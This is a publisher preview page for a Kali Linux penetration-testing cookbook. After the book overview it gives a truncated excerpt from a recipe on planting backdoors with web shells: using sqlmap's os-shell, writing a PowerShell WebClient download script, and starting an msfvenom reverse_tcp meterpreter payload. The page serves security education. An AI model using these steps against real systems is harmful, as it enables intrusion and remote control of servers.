Book Image

Kali Linux - An Ethical Hacker's Cookbook

By : Himanshu Sharma
Book Image

Kali Linux - An Ethical Hacker's Cookbook

By: Himanshu Sharma

Overview of this book

With the current rate of hacking, it is very important to pentest your environment in order to ensure advanced-level security. This book is packed with practical recipes that will quickly get you started with Kali Linux (version 2016.2) according to your needs, and move on to core functionalities. This book will start with the installation and configuration of Kali Linux so that you can perform your tests. You will learn how to plan attack strategies and perform web application exploitation using tools such as Burp, and Jexboss. You will also learn how to perform network exploitation using Metasploit, Sparta, and Wireshark. Next, you will perform wireless and password attacks using tools such as Patator, John the Ripper, and airoscript-ng. Lastly, you will learn how to create an optimum quality pentest report! By the end of this book, you will know how to conduct advanced penetration testing thanks to the book’s crisp and task-oriented recipes.
Table of Contents (20 chapters)
Title Page
Credits
Disclaimer
About the Author
About the Reviewer
www.PacktPub.com
Customer Feedback
Preface
6
Wireless Attacks – Getting Past Aircrack-ng

Backdoors using web shells


Shell uploads are fun; uploading web shells gives us more power to browse around the servers. In this recipe, you will learn some of the ways in which we can upload a shell on the server.

How to do it...

The following steps demonstrate the use of web shells:

  1. We first check whether the user is DBA by running sqlmap with the --is-dba flag:
  1. Then, we use os-shell, which prompts us with a shell. We then run the command to check whether we have privileges:
        whoami

The following screenshot is an example of the preceding command:

  1. Luckily, we have admin rights. But we don't have RDP available to outside users. Let's try another way to get meterpreter access using PowerShell.
  1. We first create an object of System.Net.WebClient and save it as a PowerShell script on the system:
        echo $WebClient = New-Object System.Net.WebClient > abc.ps1
  1. Now we create our meterpreter.exe via msfvenom using the following command:
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=&lt...